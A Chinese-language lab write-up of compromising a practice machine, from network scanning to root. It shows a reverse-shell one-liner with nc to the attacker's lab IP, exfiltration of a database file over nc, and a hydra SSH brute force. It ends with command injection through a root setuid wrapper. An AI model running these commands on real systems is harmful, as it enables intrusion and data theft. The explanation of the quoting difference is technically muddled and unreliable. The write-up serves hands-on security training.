vulhub打靶第二周

第二周

信息收集

主机发现

​arping​和arp-scan​都可以使用，arping​在大多Linux​发行版都默认包含

但是arping无法扫一个网段，可以用shell脚本补足这个缺陷

for i in $(seq 1 254); do sudo arping -c 2 10.0.2.$i;done

‍

┌──(kali㉿kali)-[~/Tools/flask-session-cookie-manager]
└─$ sudo arp-scan -l -I eth0
Interface: eth0, type: EN10MB, MAC: 00:0c:29:bb:17:07, IPv4: 192.168.64.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.64.1    00:50:56:c0:00:08       VMware, Inc.
192.168.64.2    00:50:56:e3:65:6e       VMware, Inc.
192.168.64.135  00:0c:29:4b:7a:01       VMware, Inc.
192.168.64.254  00:50:56:ee:a4:c0       VMware, Inc.

6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.038 seconds (125.61 hosts/sec). 4 responded

也可以用nmap主机发现

┌──(kali㉿kali)-[~/Tools/flask-session-cookie-manager]
└─$ sudo nmap -sn -PP 192.168.64.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-11 16:06 CST
Nmap scan report for 192.168.64.1
Host is up (0.0063s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.64.2
Host is up (0.00011s latency).
MAC Address: 00:50:56:E3:65:6E (VMware)
Nmap scan report for 192.168.64.135
Host is up (0.0036s latency).
MAC Address: 00:0C:29:4B:7A:01 (VMware)
Nmap scan report for 192.168.64.254
Host is up (0.00016s latency).
MAC Address: 00:50:56:EE:A4:C0 (VMware)
Nmap scan report for 192.168.64.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.33 seconds

全端口扫描

┌──(kali㉿kali)-[~/Tools/flask-session-cookie-manager]
└─$ sudo nmap --min-rate 10000 -p- 192.168.64.135
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-11 16:06 CST
Nmap scan report for 192.168.64.135
Host is up (0.00058s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
8080/tcp open  http-proxy
MAC Address: 00:0C:29:4B:7A:01 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.51 seconds

详细信息探测：

┌──(kali㉿kali)-[~/Tools/flask-session-cookie-manager]
└─$ sudo nmap -sV -sT -O -p22,8080 192.168.64.135
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-11 16:07 CST
Nmap scan report for 192.168.64.135
Host is up (0.00038s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
8080/tcp open  http    Werkzeug httpd 0.14.1 (Python 2.7.15rc1)
MAC Address: 00:0C:29:4B:7A:01 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.02 seconds

发现有一个8080端口的服务，访问看看

img-8mlc3JSZ-1686487541674]​

有一个输入框，经过测试后发现存在sql注入：

img-HoG3lBOW-1686487541676

​qaq

登陆后发现存在命令执行：

​[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-iFqyuA6u-1686487541676)(https://qing3feng.github.io/Blogimages/vulhub打靶第二周/image-20230611163628-kl7xjaw.png)]​

那就弹个shell：

bash;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.64.128 2333 >/tmp/f

​[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ldiXGZpm-1686487541677)(https://qing3feng.github.io/Blogimages/vulhub打靶第二周/image-20230611163810-gkyk5rf.png)]​

suid提权提不上

‍

就继续进行信息收集，发现有一个sql文件：

scanner@cloudav:~/cloudav_app$ ls
ls
app.py  database.sql  samples  templates

利用nc传到本地：

靶机输入:nc 192.168.64.128 4444 < database.sql​

Kali输入：sudo nc -lvnp 4444>database.sql​

再用Kali看一下sql文件里面有什么数据：

┌──(kali㉿kali)-[~/HTB/week2]
└─$ file database.sql                                       
database.sql: SQLite 3.x database, last written using SQLite version 3011000, page size 1024, file counter 4, database pages 2, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                           
┌──(kali㉿kali)-[~/HTB/week2]
└─$ sqlite3 database.sql                                    
SQLite version 3.40.1 2022-12-28 14:03:47
Enter ".help" for usage hints.
sqlite> .databases;
Error: unknown command or invalid arguments:  "databases;". Enter ".help" for help
sqlite> .database
main: /home/kali/HTB/week2/database.sql r/w
sqlite> .dump
PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE `code` (
        `password`      TEXT
);
INSERT INTO code VALUES('myinvitecode123');
INSERT INTO code VALUES('mysecondinvitecode');
INSERT INTO code VALUES('cloudavtech');
INSERT INTO code VALUES('mostsecurescanner');
COMMIT;
sqlite>

发现有四个密码，我们看看靶机有几个账号可以登陆

scanner@cloudav:~/cloudav_app$ cat /etc/passwd | grep "/bin/bash"
cat /etc/passwd | grep "/bin/bash"
root:x:0:0:root:/root:/bin/bash
cloudav:x:1000:1000:cloudav:/home/cloudav:/bin/bash
scanner:x:1001:1001:scanner,,,:/home/scanner:/bin/bash

有三个账号可以登陆

用hydra爆破一下，先创建两个文件，一个user.txt

root
cloudav
scanner

一个password.txt​

myinvitecode123
mysecondinvitecode
cloudavtech
mostsecurescanner

爆破：

┌──(kali㉿kali)-[~/HTB/week2]
└─$ hydra -L user.txt -P password.txt ssh://192.168.64.135
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-06-11 17:18:30
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 12 tasks per 1 server, overall 12 tasks, 12 login tries (l:3/p:4), ~1 try per task
[DATA] attacking ssh://192.168.64.135:22/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-06-11 17:18:35

爆破也不成功，只能看有没有什么其他可利用的，发现/home/scanner​下面有一个c语言程序，还是root所属，看一下他的代码L：

#include 

int main(int argc, char *argv[])
{
char *freshclam="/usr/bin/freshclam";
if (argc < 2){
printf("This tool lets you update antivirus rules\nPlease supply command line arguments for freshclam\n");
return 1;
}
char *command = malloc(strlen(freshclam) + strlen(argv[1]) + 2);
sprintf(command, "%s %s", freshclam, argv[1]);
setgid(0);
setuid(0);
system(command);
return 0;

}

这里使用了system执行命令，而且需要一个参数，只会把第一个参数作为命令来执行

‍

这里有点奇怪,是吧

$ ./update_cloudav "whoami;id"
ERROR: Problem with internal logger (UpdateLogFile = /var/log/clamav/freshclam.log).
ERROR: /var/log/clamav/freshclam.log is locked by another process
uid=0(root) gid=0(root) groups=0(root),1001(scanner)
$ ./update_cloudav whoami;id
ERROR: Problem with internal logger (UpdateLogFile = /var/log/clamav/freshclam.log).
ERROR: /var/log/clamav/freshclam.log is locked by another process
uid=1001(scanner) gid=1001(scanner) groups=1001(scanner)

这里不用引号就不是root权限

为什么会导致这种差异呢？

当你使用引号括起来的命令行参数时，例如 ./update_cloudav "whoami;id"​，整个命令行参数会被视为一个单一的字符串传递给 freshclam​ 命令。在这种情况下，freshclam​ 接收到的参数是 "whoami;id"​，并将其视为单个参数进行处理。因此，命令在执行时可能会按照预期将参数作为一个整体进行处理，并执行其中的多个命令。

而对于没有引号的命令行参数，例如 ./update_cloudav whoami;id​，分号 (;​) 被视为命令的分隔符。在命令行解析过程中，whoami​ 和 id​ 被解析为两个独立的命令，并且 freshclam​ 接收到这两个命令作为参数之一。然后，freshclam​ 可能会按顺序执行这两个命令，即先执行 whoami​，然后执行 id​。

‍

那就用引号的方式拿到root权限

​[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6n0dMt32-1686487541677)(https://qing3feng.github.io/Blogimages/vulhub打靶第二周/image-20230611184734-5sukxz3.png)]​

至此打靶完成

‍